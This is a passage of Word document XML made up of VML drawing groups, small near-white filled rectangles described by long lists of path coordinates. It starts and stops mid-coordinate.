5772,9857,5772,9856,5772,9856,5772,9855,5772,9854,5772,9854,5772,9853,5772,9852,5772,9851,5772,9850,5772,9849,5772,9848,5772,9848,5772,9847,5772,9846,5772,9845,5772,9843,5772,9842,5772,9841,5772,9840,5772,9839,5772,9838,5772,9836,5772,9835,5772,9834,5772,9832,5772,9831,5772,9830,5772,9828,5772,9827,5772,9825,5772,9824,5772,9822,5772,9820,5772,9819,5772,9817,5772,9815,5772,9813,5772,9812,5772,9810,5772,9808,5772,9806,5772,9804,5772,9802,5772,9800,5772,9798,5772,9796,5772,9793,5772,9791,5772,9789,5772,9786,5772,9784,5772,9782,5772,9779,5772,9777,5772,9774,5772,9772,5772,9769,5772,9766,5772,9763,5772,9761,5772,9758,5772,9755,5772,9752,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5772,9749,5771,9749,5771,9749,5771,9749,5771,9749,5771,9749,5771,9749,5771,9749,5771,9749,5770,9749,5770,9749,5770,9749,5770,9749,5769,9749,5769,9749,5769,9749,5768,9749,5768,9749,5767,9749,5767,9749,5766,9749,5766,9749,5765,9749,5765,9749,5764,9749,5764,9749,5763,9749,5762,9749,5761,9749,5761,9749,5760,9749,5759,9749,5758,9749,5757,9749,5756,9749,5755,9749,5754,9749,5753,9749,5752,9749,5751,9749,5749,9749,5748,9749,5747,9749,5745,9749,5744,9749,5742,9749,5741,9749,5739,9749,5738,9749,5736,9749,5734,9749,5732,9749,5730,9749,5728,9749,5726,9749,5724,9749,5722,9749,5720,9749,5718,9749,5715,9749,5713,9749,5711,9749,5708,9749,5705,9749,5703,9749,5700,9749,5697,9749,5694,9749,5691,9749,5688,9749,5685,9749,5682,9749,5679,9749,5676,9749,5672,9749,5669,9749,5665,9749,5662,9749,5658,9749,5654,9749,5650,9749,5646,9749,5642,9749,5638,9749,5634,9749,5629,9749,5625,9749,5621,9749,5616,9749,5611,9749,5606,9749,5602,9749,5597,9749,5592,9749,5586,9749,5581,9749,5576,9749,5570,9749,5565,9749,5559,9749,5553,9749,5548,9749,5542,9749,5536,9749,5529,9749,5523,9749,5517e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:288.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,5770" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:5770;width:130;height:270" coordorigin="2070,5770" coordsize="130,270" path="m2080,5787l2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2080,5787,2081,5787,2081,5787,2081,5787,2081,5787,2081,5787,2081,5787,2081,5787,2081,5787,2081,5787,2082,5787,2082,5787,2082,5787,2082,5787,2082,5787,2083,5787,2083,5787,2083,5787,2083,5787,2084,5787,2084,5787,2084,5787,2085,5787,2085,5787,2085,5787,2086,5787,2086,5787,2087,5787,2087,5787,2087,5787,2088,5787,2088,5787,2089,5787,2089,5787,2090,5787,2091,5787,2091,5787,2092,5787,2093,5787,2093,5787,2094,5787,2095,5787,2095,5787,2096,5787,2097,5787,2098,5787,2099,5787,2100,5787,2101,5787,2101,5787,2102,5787,2103,5787,2104,5787,2106,5787,2107,5787,2108,5787,2109,5787,2110,5787,2111,5787,2113,5787,2114,5787,2115,5787,2117,5787,2118,5787,2119,5787,2121,5787,2122,5787,2124,5787,2125,5787,2127,5787,2129,5787,2130,5787,2132,5787,2134,5787,2136,5787,2137,5787,2139,5787,2141,5787,2143,5787,2145,5787,2147,5787,2149,5787,2151,5787,2153,5787,2156,5787,2158,5787,2160,5787,2163,5787,2165,5787,2167,5787,2170,5787,2172,5787,2175,5787,2177,5787,2180,5787,2183,5787,2186,5787,2188,5787,2191,5787,2194,5787,2197,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5787,2200,5788,2200,5788,2200,5788,2200,5788,2200,5788,2200,5788,2200,5789,2200,5789,2200,5789,2200,5789,2200,5790,2200,5790,2200,5790,2200,5791,2200,5791,2200,5791,2200,5792,2200,5792,2200,5793,2200,5793,2200,5794,2200,5795,2200,5795,2200,5796,2200,5797,2200,5797,2200,5798,2200,5799,2200,5800,2200,5801,2200,5802,2200,5803,2200,5804,2200,5805,2200,5806,2200,5807,2200,5808,2200,5809,2200,5811,2200,5812,2200,5814,2200,5815,2200,5816,2200,5818,2200,5820,2200,5821,2200,5823,2200,5825,2200,5827,2200,5828,2200,5830,2200,5832,2200,5835,2200,5837,2200,5839,2200,5841,2200,5843,2200,5846,2200,5848,2200,5851,2200,5853,2200,5856,2200,5859,2200,5862,2200,5864,2200,5867,2200,5870,2200,5873,2200,5877,2200,5880,2200,5883,2200,5887,2200,5890,2200,5894,2200,5897,2200,5901,2200,5905,2200,5909,2200,5913,2200,5917,2200,5921,2200,5925,2200,5929,2200,5934,2200,5938,2200,5943,2200,5948,2200,5952,2200,5957,2200,5962,2200,5967,2200,5972,2200,5978,2200,5983,2200,5988,2200,5994,2200,6000,2200,6005,2200,6011,2200,6017,2200,6023,2200,6029,2200,6036,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2200,6042,2199,6042,2199,6042,2199,6042,2199,6042,2199,6042,2199,6042,2199,6042,2199,6042,2198,6042,2198,6042,2198,6042,2198,6042,2198,6042,2197,6042,2197,6042,2197,6042,2196,6042,2196,6042,2196,6042,2196,6042,2195,6042,2195,6042,2194,6042,2194,6042,2194,6042,2193,6042,2193,6042,2192,6042,2192,6042,2191,6042,2191,6042,2190,6042,2190,6042,2189,6042,2188,6042,2188,6042,2187,6042,2186,6042,2185,6042,2185,6042,2184,6042,2183,6042,2182,6042,2181,6042,2181,6042,2180,6042,2179,6042,2178,6042,2177,6042,2176,6042,2175,6042,2174,6042,2172,6042,2171,6042,2170,6042,2169,6042,2168,6042,2166,6042,2165,6042,2164,6042,2162,6042,2161,6042,2159,6042,2158,6042,2156,6042,2155,6042,2153,6042,2152,6042,2150,6042,2148,6042,2146,6042,2145,6042,2143,6042,2141,6042,2139,6042,2137,6042,2135,6042,2133,6042,2131,6042,2129,6042,2127,6042,2125,6042,2122,6042,2120,6042,2118,6042,2115,6042,2113,6042,2110,6042,2108,6042,2105,6042,2103,6042,2100,6042,2097,6042,2095,6042,2092,6042,2089,6042,2086,6042,2083,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6042,2080,6041,2080,6041,2080,6041,2080,6041,2080,6041,2080,6041,2080,6040,2080,6040,2080,6040,2080,6040,2080,6039,2080,6039,2080,6039,2080,6038,2080,6038,2080,6038,2080,6037,2080,6037,2080,6036,2080,6036,2080,6035,2080,6034,2080,6034,2080,6033,2080,6032,2080,6032,2080,6031,2080,6030,2080,6029,2080,6028,2080,6027,2080,6026,2080,6025,2080,6024,2080,6023,2080,6022,2080,6021,2080,6020,2080,6018,2080,6017,2080,6015,2080,6014,2080,6013,2080,6011,2080,6009,2080,6008,2080,6006,2080,6004,2080,6002,2080,6000,2080,5999,2080,5997,2080,5994,2080,5992,2080,5990,2080,5988,2080,5986,2080,5983,2080,5981,2080,5978,2080,5976,2080,5973,2080,5970,2080,5967,2080,5965,2080,5962,2080,5959,2080,5955,2080,5952,2080,5949,2080,5946,2080,5942,2080,5939,2080,5935,2080,5932,2080,5928,2080,5924,2080,5920,2080,5916,2080,5912,2080,5908,2080,5904,2080,5900,2080,5895,2080,5891,2080,5886,2080,5881,2080,5877,2080,5872,2080,5867,2080,5862,2080,5857,2080,5851,2080,5846,2080,5841,2080,5835,2080,5829,2080,5824,2080,5818,2080,5812,2080,5806,2080,5800,2080,5793,2080,5787e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:306.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,6130" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:6130;width:130;height:270" coordorigin="2650,6130" coordsize="130,270" path="m2665,6147l2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2665,6147,2666,6147,2666,6147,2666,6147,2666,6147,2666,6147,2666,6147,2666,6147,2666,6147,2666,6147,2666,6147,2666,6147,2666,6147,2667,6147,2667,6147,2667,6147,2667,6147,2667,6147,2667,6147,2668,6147,2668,6147,2668,6147,2668,6147,2669,6147,2669,6147,2669,6147,2670,6147,2670,6147,2670,6147,2671,6147,2671,6147,2671,6147,2672,6147,2672,6147,2673,6147,2673,6147,2674,6147,2674,6147,2675,6147,2675,6147,2676,6147,2677,6147,2677,6147,2678,6147,2679,6147,2679,6147,2680,6147,2681,6147,2682,6147,2682,6147,2683,6147,2684,6147,2685,6147,2686,6147,2687,6147,2688,6147,2689,6147,2690,6147,2691,6147,2692,6147,2693,6147,2694,6147,2695,6147,2697,6147,2698,6147,2699,6147,2700,6147,2702,6147,2703,6147,2705,6147,2706,6147,2708,6147,2709,6147,2711,6147,2712,6147,2714,6147,2716,6147,2717,6147,2719,6147,2721,6147,2723,6147,2725,6147,2726,6147,2728,6147,2730,6147,2732,6147,2734,6147,2737,6147,2739,6147,2741,6147,2743,6147,2745,6147,2748,6147,2750,6147,2753,6147,2755,6147,2758,6147,2760,6147,2763,6147,2765,6147,2768,6147,2771,6147,2774,6147,2777,6147,2779,6147,2782,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6147,2785,6148,2785,6148,2785,6148,2785,6148,2785,6148,2785,6148,2785,6148,2785,6148,2785,6149,2785,6149,2785,6149,2785,6149,2785,6150,2785,6150,2785,6150,2785,6151,2785,6151,2785,6152,2785,6152,2785,6153,2785,6153,2785,6154,2785,6154,2785,6155,2785,6155,2785,6156,2785,6157,2785,6158,2785,6158,2785,6159,2785,6160,2785,6161,2785,6162,2785,6163,2785,6164,2785,6165,2785,6166,2785,6167,2785,6168,2785,6170,2785,6171,2785,6172,2785,6174,2785,6175,2785,6177,2785,6178,2785,6180,2785,6181,2785,6183,2785,6185,2785,6187,2785,6189,2785,6191,2785,6193,2785,6195,2785,6197,2785,6199,2785,6201,2785,6204,2785,6206,2785,6208,2785,6211,2785,6214,2785,6216,2785,6219,2785,6222,2785,6225,2785,6228,2785,6231,2785,6234,2785,6237,2785,6240,2785,6243,2785,6247,2785,6250,2785,6254,2785,6257,2785,6261,2785,6265,2785,6269,2785,6273,2785,6277,2785,6281,2785,6285,2785,6290,2785,6294,2785,6298,2785,6303,2785,6308,2785,6313,2785,6317,2785,6322,2785,6327,2785,6333,2785,6338,2785,6343,2785,6349,2785,6354,2785,6360,2785,6366,2785,6371,2785,6377,2785,6383,2785,6390,2785,6396,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2785,6402,2784,6402,2784,6402,2784,6402,2784,6402,2784,6402,2784,6402,2783,6402,2783,6402,2783,6402,2783,6402,2783,6402,2782,6402,2782,6402,2782,6402,2781,6402,2781,6402,2781,6402,2780,6402,2780,6402,2780,6402,2779,6402,2779,6402,2778,6402,2778,6402,2778,6402,2777,6402,2776,6402,2776,6402,2775,6402,2775,6402,2774,6402,2774,6402,2773,6402,2772,6402,2772,6402,2771,6402,2770,6402,2769,6402,2768,6402,2768,6402,2767,6402,2766,6402,2765,6402,2764,6402,2763,6402,2762,6402,2761,6402,2760,6402,2759,6402,2758,6402,2757,6402,2755,6402,2754,6402,2753,6402,2752,6402,2750,6402,2749,6402,2748,6402,2746,6402,2745,6402,2743,6402,2742,6402,2740,6402,2738,6402,2737,6402,2735,6402,2733,6402,2732,6402,2730,6402,2728,6402,2726,6402,2724,6402,2722,6402,2720,6402,2718,6402,2716,6402,2714,6402,2712,6402,2710,6402,2708,6402,2705,6402,2703,6402,2701,6402,2698,6402,2696,6402,2693,6402,2691,6402,2688,6402,2685,6402,2683,6402,2680,6402,2677,6402,2674,6402,2671,6402,2668,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6402,2665,6401,2665,6401,2665,6401,2665,6401,2665,6401,2665,6401,2665,6400,2665,6400,2665,6400,2665,6400,2665,6399,2665,6399,2665,6399,2665,6398,2665,6398,2665,6397,2665,6397,2665,6396,2665,6396,2665,6395,2665,6395,2665,6394,2665,6393,2665,6393,2665,6392,2665,6391,2665,6390,2665,6389,2665,6388,2665,6387,2665,6387,2665,6385,2665,6384,2665,6383,2665,6382,2665,6381,2665,6380,2665,6378,2665,6377,2665,6376,2665,6374,2665,6373,2665,6371,2665,6370,2665,6368,2665,6366,2665,6364,2665,6363,2665,6361,2665,6359,2665,6357,2665,6355,2665,6352,2665,6350,2665,6348,2665,6346,2665,6343,2665,6341,2665,6338,2665,6336,2665,6333,2665,6330,2665,6328,2665,6325,2665,6322,2665,6319,2665,6316,2665,6312,2665,6309,2665,6306,2665,6303,2665,6299,2665,6295,2665,6292,2665,6288,2665,6284,2665,6280,2665,6276,2665,6272,2665,6268,2665,6264,2665,6260,2665,6255,2665,6251,2665,6246,2665,6242,2665,6237,2665,6232,2665,6227,2665,6222,2665,6217,2665,6212,2665,6206,2665,6201,2665,6195,2665,6190,2665,6184,2665,6178,2665,6172,2665,6166,2665,6160,2665,6153,2665,6147e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:306.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,6130" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:6130;width:130;height:270" coordorigin="3010,6130" coordsize="130,270" path="m3026,6147l3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3026,6147,3027,6147,3027,6147,3027,6147,3027,6147,3027,6147,3027,6147,3027,6147,3028,6147,3028,6147,3028,6147,3028,6147,3029,6147,3029,6147,3029,6147,3029,6147,3030,6147,3030,6147,3030,6147,3031,6147,3031,6147,3032,6147,3032,6147,3032,6147,3033,6147,3033,6147,3034,6147,3034,6147,3035,6147,3036,6147,3036,6147,3037,6147,3037,6147,3038,6147,3039,6147,3039,6147,3040,6147,3041,6147,3042,6147,3043,6147,3043,6147,3044,6147,3045,6147,3046,6147,3047,6147,3048,6147,3049,6147,3050,6147,3051,6147,3052,6147,3053,6147,3054,6147,3056,6147,3057,6147,3058,6147,3059,6147,3061,6147,3062,6147,3063,6147,3065,6147,3066,6147,3068,6147,3069,6147,3071,6147,3072,6147,3074,6147,3076,6147,3077,6147,3079,6147,3081,6147,3083,6147,3085,6147,3087,6147,3089,6147,3091,6147,3093,6147,3095,6147,3097,6147,3099,6147,3101,6147,3103,6147,3106,6147,3108,6147,3110,6147,3113,6147,3115,6147,3118,6147,3120,6147,3123,6147,3126,6147,3128,6147,3131,6147,3134,6147,3137,6147,3140,6147,3143,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6147,3146,6148,3146,6148,3146,6148,3146,6148,3146,6148,3146,6148,3146,6148,3146,6148,3146,6149,3146,6149,3146,6149,3146,6149,3146,6150,3146,6150,3146,6150,3146,6151,3146,6151,3146,6152,3146,6152,3146,6153,3146,6153,3146,6154,3146,6154,3146,6155,3146,6155,3146,6156,3146,6157,3146,6158,3146,6158,3146,6159,3146,6160,3146,6161,3146,6162,3146,6163,3146,6164,3146,6165,3146,6166,3146,6167,3146,6168,3146,6170,3146,6171,3146,6172,3146,6174,3146,6175,3146,6177,3146,6178,3146,6180,3146,6181,3146,6183,3146,6185,3146,6187,3146,6189,3146,6191,3146,6193,3146,6195,3146,6197,3146,6199,3146,6201,3146,6204,3146,6206,3146,6208,3146,6211,3146,6214,3146,6216,3146,6219,3146,6222,3146,6225,3146,6228,3146,6231,3146,6234,3146,6237,3146,6240,3146,6243,3146,6247,3146,6250,3146,6254,3146,6257,3146,6261,3146,6265,3146,6269,3146,6273,3146,6277,3146,6281,3146,6285,3146,6290,3146,6294,3146,6298,3146,6303,3146,6308,3146,6313,3146,6317,3146,6322,3146,6327,3146,6333,3146,6338,3146,6343,3146,6349,3146,6354,3146,6360,3146,6366,3146,6371,3146,6377,3146,6383,3146,6390,3146,6396,3146,6402,3146,6402,3146,6402,3146,6402,3146,6402,3146,6402,3146,6402,3146,6402,3146,6402,3146,6402,3146,6402,3146,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3145,6402,3144,6402,3144,6402,3144,6402,3144,6402,3144,6402,3144,6402,3143,6402,3143,6402,3143,6402,3143,6402,3143,6402,3142,6402,3142,6402,3142,6402,3141,6402,3141,6402,3141,6402,3140,6402,3140,6402,3140,6402,3139,6402,3139,6402,3138,6402,3138,6402,3137,6402,3137,6402,3136,6402,3136,6402,3135,6402,3134,6402,3134,6402,3133,6402,3132,6402,3132,6402,3131,6402,3130,6402,3129,6402,3129,6402,3128,6402,3127,6402,3126,6402,3125,6402,3124,6402,3123,6402,3122,6402,3121,6402,3120,6402,3119,6402,3118,6402,3117,6402,3116,6402,3114,6402,3113,6402,3112,6402,3110,6402,3109,6402,3108,6402,3106,6402,3105,6402,3103,6402,3102,6402,3100,6402,3099,6402,3097,6402,3095,6402,3094,6402,3092,6402,3090,6402,3088,6402,3086,6402,3084,6402,3083,6402,3081,6402,3079,6402,3076,6402,3074,6402,3072,6402,3070,6402,3068,6402,3065,6402,3063,6402,3061,6402,3058,6402,3056,6402,3053,6402,3051,6402,3048,6402,3045,6402,3043,6402,3040,6402,3037,6402,3034,6402,3031,6402,3029,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6402,3026,6401,3026,6401,3026,6401,3026,6401,3026,6401,3026,6401,3026,6400,3026,6400,3026,6400,3026,6400,3026,6399,3026,6399,3026,6399,3026,6398,3026,6398,3026,6397,3026,6397,3026,6396,3026,6396,3026,6395,3026,6395,3026,6394,3026,6393,3026,6393,3026,6392,3026,6391,3026,6390,3026,6389,3026,6388,3026,6387,3026,6387,3026,6385,3026,6384,3026,6383,3026,6382,3026,6381,3026,6380,3026,6378,3026,6377,3026,6376,3026,6374,3026,6373,3026,6371,3026,6370,3026,6368,3026,6366,3026,6364,3026,6363,3026,6361,3026,6359,3026,6357,3026,6355,3026,6352,3026,6350,3026,6348,3026,6346,3026,6343,3026,6341,3026,6338,3026,6336,3026,6333,3026,6330,3026,6328,3026,6325,3026,6322,3026,6319,3026,6316,3026,6312,3026,6309,3026,6306,3026,6303,3026,6299,3026,6295,3026,6292,3026,6288,3026,6284,3026,6280,3026,6276,3026,6272,3026,6268,3026,6264,3026,6260,3026,6255,3026,6251,3026,6246,3026,6242,3026,6237,3026,6232,3026,6227,3026,6222,3026,6217,3026,6212,3026,6206,3026,6201,3026,6195,3026,6190,3026,6184,3026,6178,3026,6172,3026,6166,3026,6160,3026,6153,3026,6147e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:85.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1710,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:1710;top:6390;width:130;height:270" coordorigin="1710,6390" coordsize="130,270" path="m1720,6417l1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1720,6417,1721,6417,1721,6417,1721,6417,1721,6417,1721,6417,1721,6417,1721,6417,1721,6417,1722,6417,1722,6417,1722,6417,1722,6417,1722,6417,1723,6417,1723,6417,1723,6417,1723,6417,1724,6417,1724,6417,1724,6417,1725,6417,1725,6417,1726,6417,1726,6417,1726,6417,1727,6417,1727,6417,1728,6417,1728,6417,1729,6417,1729,6417,1730,6417,1730,6417,1731,6417,1732,6417,1732,6417,1733,6417,1734,6417,1734,6417,1735,6417,1736,6417,1737,6417,1738,6417,1739,6417,1739,6417,1740,6417,1741,6417,1742,6417,1743,6417,1744,6417,1745,6417,1746,6417,1748,6417,1749,6417,1750,6417,1751,6417,1752,6417,1754,6417,1755,6417,1756,6417,1758,6417,1759,6417,1761,6417,1762,6417,1764,6417,1765,6417,1767,6417,1768,6417,1770,6417,1772,6417,1774,6417,1775,6417,1777,6417,1779,6417,1781,6417,1783,6417,1785,6417,1787,6417,1789,6417,1791,6417,1793,6417,1795,6417,1798,6417,1800,6417,1802,6417,1805,6417,1807,6417,1810,6417,1812,6417,1815,6417,1817,6417,1820,6417,1823,6417,1825,6417,1828,6417,1831,6417,1834,6417,1837,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6417,1840,6418,1840,6418,1840,6418,1840,6418,1840,6418,1840,6418,1840,6418,1840,6418,1840,6419,1840,6419,1840,6419,1840,6419,1840,6420,1840,6420,1840,6420,1840,6421,1840,6421,1840,6421,1840,6422,1840,6422,1840,6423,1840,6423,1840,6424,1840,6424,1840,6425,1840,6426,1840,6426,1840,6427,1840,6428,1840,6428,1840,6429,1840,6430,1840,6431,1840,6432,1840,6433,1840,6434,1840,6435,1840,6436,1840,6437,1840,6439,1840,6440,1840,6441,1840,6442,1840,6444,1840,6445,1840,6447,1840,6448,1840,6450,1840,6452,1840,6453,1840,6455,1840,6457,1840,6459,1840,6461,1840,6463,1840,6465,1840,6467,1840,6469,1840,6471,1840,6474,1840,6476,1840,6479,1840,6481,1840,6484,1840,6486,1840,6489,1840,6492,1840,6495,1840,6498,1840,6501,1840,6504,1840,6507,1840,6510,1840,6514,1840,6517,1840,6520,1840,6524,1840,6528,1840,6531,1840,6535,1840,6539,1840,6543,1840,6547,1840,6551,1840,6555,1840,6560,1840,6564,1840,6569,1840,6573,1840,6578,1840,6583,1840,6588,1840,6592,1840,6598,1840,6603,1840,6608,1840,6613,1840,6619,1840,6624,1840,6630,1840,6636,1840,6642,1840,6647,1840,6654,1840,6660,1840,6666,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1840,6672,1839,6672,1839,6672,1839,6672,1839,6672,1839,6672,1839,6672,1839,6672,1839,6672,1839,6672,1838,6672,1838,6672,1838,6672,1838,6672,1838,6672,1837,6672,1837,6672,1837,6672,1837,6672,1836,6672,1836,6672,1836,6672,1835,6672,1835,6672,1835,6672,1834,6672,1834,6672,1833,6672,1833,6672,1833,6672,1832,6672,1832,6672,1831,6672,1830,6672,1830,6672,1829,6672,1829,6672,1828,6672,1827,6672,1827,6672,1826,6672,1825,6672,1825,6672,1824,6672,1823,6672,1822,6672,1821,6672,1820,6672,1819,6672,1818,6672,1818,6672,1817,6672,1815,6672,1814,6672,1813,6672,1812,6672,1811,6672,1810,6672,1809,6672,1807,6672,1806,6672,1805,6672,1803,6672,1802,6672,1801,6672,1799,6672,1798,6672,1796,6672,1795,6672,1793,6672,1791,6672,1790,6672,1788,6672,1786,6672,1784,6672,1783,6672,1781,6672,1779,6672,1777,6672,1775,6672,1773,6672,1771,6672,1769,6672,1767,6672,1764,6672,1762,6672,1760,6672,1757,6672,1755,6672,1753,6672,1750,6672,1748,6672,1745,6672,1742,6672,1740,6672,1737,6672,1734,6672,1732,6672,1729,6672,1726,6672,1723,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6672,1720,6671,1720,6671,1720,6671,1720,6671,1720,6671,1720,6671,1720,6670,1720,6670,1720,6670,1720,6669,1720,6669,1720,6669,1720,6668,1720,6668,1720,6667,1720,6667,1720,6666,1720,6666,1720,6665,1720,6665,1720,6664,1720,6663,1720,6663,1720,6662,1720,6661,1720,6660,1720,6659,1720,6659,1720,6658,1720,6657,1720,6656,1720,6655,1720,6653,1720,6652,1720,6651,1720,6650,1720,6649,1720,6647,1720,6646,1720,6644,1720,6643,1720,6641,1720,6640,1720,6638,1720,6636,1720,6635,1720,6633,1720,6631,1720,6629,1720,6627,1720,6625,1720,6623,1720,6620,1720,6618,1720,6616,1720,6613,1720,6611,1720,6608,1720,6606,1720,6603,1720,6601,1720,6598,1720,6595,1720,6592,1720,6589,1720,6586,1720,6583,1720,6579,1720,6576,1720,6573,1720,6569,1720,6566,1720,6562,1720,6558,1720,6554,1720,6551,1720,6547,1720,6543,1720,6538,1720,6534,1720,6530,1720,6525,1720,6521,1720,6516,1720,6512,1720,6507,1720,6502,1720,6497,1720,6492,1720,6487,1720,6482,1720,6476,1720,6471,1720,6465,1720,6460,1720,6454,1720,6448,1720,6442,1720,6436,1720,6430,1720,6424,1720,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:115.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2310,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:2310;top:6390;width:130;height:270" coordorigin="2310,6390" coordsize="130,270" path="m2320,6417l2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2320,6417,2321,6417,2321,6417,2321,6417,2321,6417,2321,6417,2321,6417,2321,6417,2321,6417,2321,6417,2321,6417,2322,6417,2322,6417,2322,6417,2322,6417,2322,6417,2323,6417,2323,6417,2323,6417,2323,6417,2323,6417,2324,6417,2324,6417,2324,6417,2325,6417,2325,6417,2325,6417,2326,6417,2326,6417,2327,6417,2327,6417,2328,6417,2328,6417,2329,6417,2329,6417,2330,6417,2330,6417,2331,6417,2331,6417,2332,6417,2333,6417,2333,6417,2334,6417,2335,6417,2336,6417,2336,6417,2337,6417,2338,6417,2339,6417,2340,6417,2341,6417,2342,6417,2343,6417,2344,6417,2345,6417,2346,6417,2347,6417,2348,6417,2349,6417,2350,6417,2351,6417,2353,6417,2354,6417,2355,6417,2357,6417,2358,6417,2359,6417,2361,6417,2362,6417,2364,6417,2365,6417,2367,6417,2369,6417,2370,6417,2372,6417,2374,6417,2376,6417,2377,6417,2379,6417,2381,6417,2383,6417,2385,6417,2387,6417,2389,6417,2391,6417,2394,6417,2396,6417,2398,6417,2400,6417,2403,6417,2405,6417,2407,6417,2410,6417,2412,6417,2415,6417,2418,6417,2420,6417,2423,6417,2426,6417,2429,6417,2431,6417,2434,6417,2437,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6417,2440,6418,2440,6418,2440,6418,2440,6418,2440,6418,2440,6418,2440,6418,2440,6418,2440,6419,2440,6419,2440,6419,2440,6419,2440,6420,2440,6420,2440,6420,2440,6421,2440,6421,2440,6421,2440,6422,2440,6422,2440,6423,2440,6423,2440,6424,2440,6424,2440,6425,2440,6426,2440,6426,2440,6427,2440,6428,2440,6428,2440,6429,2440,6430,2440,6431,2440,6432,2440,6433,2440,6434,2440,6435,2440,6436,2440,6437,2440,6439,2440,6440,2440,6441,2440,6442,2440,6444,2440,6445,2440,6447,2440,6448,2440,6450,2440,6452,2440,6453,2440,6455,2440,6457,2440,6459,2440,6461,2440,6463,2440,6465,2440,6467,2440,6469,2440,6471,2440,6474,2440,6476,2440,6479,2440,6481,24